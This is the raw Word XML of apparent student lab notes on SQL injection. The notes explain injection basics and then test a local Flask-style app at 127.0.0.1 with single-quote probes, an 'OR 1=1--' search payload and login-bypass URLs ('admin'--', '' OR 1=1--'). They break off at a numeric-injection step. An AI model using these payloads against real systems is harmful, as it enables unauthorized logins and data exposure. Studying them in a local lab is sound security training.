        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>If user input is inserted directly into SQL, it’s dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37816E83" w14:textId="6DB69036" w:rsidR="00937EF7" w:rsidRPr="00937EF7" w:rsidRDefault="00937EF7" w:rsidP="00937EF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>SQL comments (--) can disable password checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B797985" w14:textId="4D8744A9" w:rsidR="00937EF7" w:rsidRPr="00937EF7" w:rsidRDefault="00937EF7" w:rsidP="00937EF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>Logic like OR 1=1 always evaluates to true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37CCAA" w14:textId="48D462ED" w:rsidR="00937EF7" w:rsidRPr="00937EF7" w:rsidRDefault="00937EF7" w:rsidP="00937EF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>This can cause the app to log in the attacker as another user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4E67D" w14:textId="7AD6D598" w:rsidR="00B94229" w:rsidRPr="00E97321" w:rsidRDefault="00937EF7" w:rsidP="006B6F9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00937EF7">
        <w:t>Login-related SQL injection is critical severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577798DB" w14:textId="0809622B" w:rsidR="006909D2" w:rsidRPr="0060565B" w:rsidRDefault="006909D2" w:rsidP="006909D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006909D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding SQL Injection Bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="0060565B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56F79A" w14:textId="12D36317" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>Some SQL injection bugs are easy to spot, others are hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12659A1A" w14:textId="703E8D1A" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>Any data sent to the server can be dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5920A" w14:textId="0674FC77" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>Test URLs, forms, cookies, headers — everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250651F" w14:textId="37431707" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>Multi-step forms can hide vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214427C9" w14:textId="41972AD1" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>SQL strings use single quotes, which are often the weak point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB71579" w14:textId="042259F5" w:rsidR="002D08EA" w:rsidRPr="002D08EA" w:rsidRDefault="002D08EA" w:rsidP="002D08EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D08EA">
        <w:t>Careful, structured testing finds most SQL injection flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707F611" w14:textId="77777777" w:rsidR="006909D2" w:rsidRDefault="006909D2" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C20B711" w14:textId="77777777" w:rsidR="000468A5" w:rsidRDefault="000468A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B97EF4" w14:textId="49B5523C" w:rsidR="0057332B" w:rsidRPr="0060565B" w:rsidRDefault="0057332B" w:rsidP="0057332B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Practising the SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="002F3731">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a local website</w:t>
      </w:r>
      <w:r w:rsidRPr="0060565B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0674BF" w14:textId="11CF2504" w:rsidR="0057332B" w:rsidRDefault="000468A5" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intit_db.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC68AB1" w14:textId="1E5A69A0" w:rsidR="000468A5" w:rsidRDefault="000468A5" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000468A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D92EBEE" wp14:editId="16A25C08">
            <wp:extent cx="5731510" cy="3740785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10288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2485" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3740785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1B3F0" w14:textId="1183EB73" w:rsidR="000468A5" w:rsidRDefault="000468A5" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AE769" w14:textId="330AD0CF" w:rsidR="000468A5" w:rsidRDefault="000468A5" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000468A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F964A0" wp14:editId="6518C544">
            <wp:extent cx="5731510" cy="3850005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="48882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6895" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3850005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56EF63" w14:textId="77777777" w:rsidR="00F304EB" w:rsidRDefault="00F304EB" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440C2AFF" w14:textId="27F33854" w:rsidR="000C0959" w:rsidRDefault="00BC77AB" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step1:</w:t>
      </w:r>
      <w:r w:rsidR="000C0959">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Goal: Normal Behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF56F0D" w14:textId="21DA5493" w:rsidR="00F304EB" w:rsidRDefault="00BC77AB" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visit</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC77AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/login?username=admin&amp;password=admin123</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14C8CD84" w14:textId="3337C6B0" w:rsidR="00BC77AB" w:rsidRDefault="00BC77AB" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC77AB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCE200E" wp14:editId="2CD66814">
            <wp:extent cx="5731510" cy="1187450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="41423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254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1187450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D115635" w14:textId="462802ED" w:rsidR="00ED68CB" w:rsidRDefault="000C0959" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/search?publisher=Wiley</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22841C54" w14:textId="3811218E" w:rsidR="00ED68CB" w:rsidRDefault="00ED68CB" w:rsidP="001911DA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED68CB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04410F12" wp14:editId="2EB31562">
            <wp:extent cx="4453372" cy="1084894"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="166453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6529" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4470392" cy="1089040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A918E2D" w14:textId="084E8B5E" w:rsidR="000C0959" w:rsidRDefault="000C0959" w:rsidP="006B6F9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visit:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0959">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/page?id=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56F2C229" w14:textId="1BBB043F" w:rsidR="00ED68CB" w:rsidRDefault="00ED68CB" w:rsidP="00ED68CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED68CB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="709EA8FE" wp14:editId="694C24EF">
            <wp:extent cx="3532909" cy="1095127"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62707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74239" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3550523" cy="1100587"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75247B0B" w14:textId="15182148" w:rsidR="00DE7720" w:rsidRDefault="00DE7720" w:rsidP="00DE7720">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7720">
        <w:t>String SQL Injection test</w:t>
      </w:r>
      <w:r>
        <w:t>s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF0732" w14:textId="4D4727A1" w:rsidR="002648B4" w:rsidRDefault="002648B4" w:rsidP="00DE7720">
      <w:r w:rsidRPr="002648B4">
        <w:t>Single quote test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/search?publisher=%27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F3296F5" w14:textId="53A3A149" w:rsidR="002648B4" w:rsidRDefault="002648B4" w:rsidP="00DE7720">
      <w:r w:rsidRPr="002648B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476F4D6D" wp14:editId="7CABD799">
            <wp:extent cx="5731510" cy="2909570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="9015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2015" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2909570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ADA7AC" w14:textId="5E462611" w:rsidR="007A2A39" w:rsidRDefault="00A155EC" w:rsidP="00DE7720">
      <w:r>
        <w:t xml:space="preserve">We can </w:t>
      </w:r>
      <w:r w:rsidRPr="00A155EC">
        <w:t>see a SQL error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it suggests that it is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F4745" w14:textId="6F7F7ED4" w:rsidR="007A2A39" w:rsidRDefault="007A2A39">
      <w:r w:rsidRPr="007A2A39">
        <w:lastRenderedPageBreak/>
        <w:t>Double quote escape test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/search?publisher=%27%27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60CAE21E" w14:textId="0EB61F90" w:rsidR="007A2A39" w:rsidRDefault="007A2A39">
      <w:r w:rsidRPr="007A2A39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE59E7E" wp14:editId="2670D69C">
            <wp:extent cx="5731510" cy="1226185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="52385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56707" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1226185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D1F3B" w14:textId="69CE9705" w:rsidR="002648B4" w:rsidRPr="00C15B6B" w:rsidRDefault="00C15B6B" w:rsidP="00DE7720">
      <w:r w:rsidRPr="00C15B6B">
        <w:t>Error disappears → SQL injection confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D236A6E" w14:textId="7FC79ABB" w:rsidR="00ED68CB" w:rsidRDefault="0027243D" w:rsidP="00421CBC">
      <w:r w:rsidRPr="0027243D">
        <w:t>OR 1=1 logic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00B40D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/search?publisher=Wiley%27%20OR%201=1--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EF254ED" w14:textId="4B34FE4D" w:rsidR="0027243D" w:rsidRDefault="0027243D" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027243D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B0C9DBF" wp14:editId="57D9D6A1">
            <wp:extent cx="5731510" cy="1108710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="135485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8800" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1108710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCD2F40" w14:textId="6ECBF314" w:rsidR="00AE3582" w:rsidRDefault="00AE3582" w:rsidP="00421CBC">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearly, </w:t>
      </w:r>
      <w:r>
        <w:t>returns all books.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0AE29C" w14:textId="21768594" w:rsidR="0027243D" w:rsidRDefault="007C38D0" w:rsidP="00421CBC">
      <w:r>
        <w:t>Step3: (Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="007C38D0">
        <w:t xml:space="preserve"> Login bypass tests</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AED2BD" w14:textId="6F8E9427" w:rsidR="00B53E69" w:rsidRDefault="00B53E69" w:rsidP="00F54934">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B53E69">
        <w:t>Known username bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00A24579" w:rsidRPr="00AD4DB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/login?username=admin%27--&amp;password=anything</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28EAFDB8" w14:textId="3704C819" w:rsidR="007C38D0" w:rsidRDefault="00B53E69" w:rsidP="00421CBC">
      <w:r w:rsidRPr="00B53E69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AF4A20" wp14:editId="40763A43">
            <wp:extent cx="5731510" cy="1226185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149119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96081" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1226185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769B558" w14:textId="50FF3F2E" w:rsidR="009F2125" w:rsidRDefault="009F2125" w:rsidP="00421CBC">
      <w:r>
        <w:t xml:space="preserve">Clearly, </w:t>
      </w:r>
      <w:r w:rsidRPr="009F2125">
        <w:t>Logged in as admi</w:t>
      </w:r>
      <w:r>
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40226326" w14:textId="3512EC59" w:rsidR="008D27B5" w:rsidRDefault="008D27B5" w:rsidP="00F54934">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008D27B5">
        <w:t>Unknown admin username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00AD4DB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/login?username=%27%20OR%201=1--&amp;password=x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D53532B" w14:textId="02A56B7D" w:rsidR="008D27B5" w:rsidRDefault="008D27B5" w:rsidP="00421CBC">
      <w:r w:rsidRPr="008D27B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F195C93" wp14:editId="33152C12">
            <wp:extent cx="5731510" cy="1153160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="16101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3406" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1153160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45425FE7" w14:textId="7F45115C" w:rsidR="000D38F0" w:rsidRDefault="000D38F0" w:rsidP="000D38F0">
      <w:r w:rsidRPr="000D38F0">
        <w:t>Logged in as first user (admin)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F9513" w14:textId="77777777" w:rsidR="00094BF9" w:rsidRDefault="00094BF9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47034FEA" w14:textId="5453A28B" w:rsidR="004526F8" w:rsidRDefault="004526F8" w:rsidP="000D38F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step4: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="004526F8">
        <w:t>Numeric SQL Injection tests</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
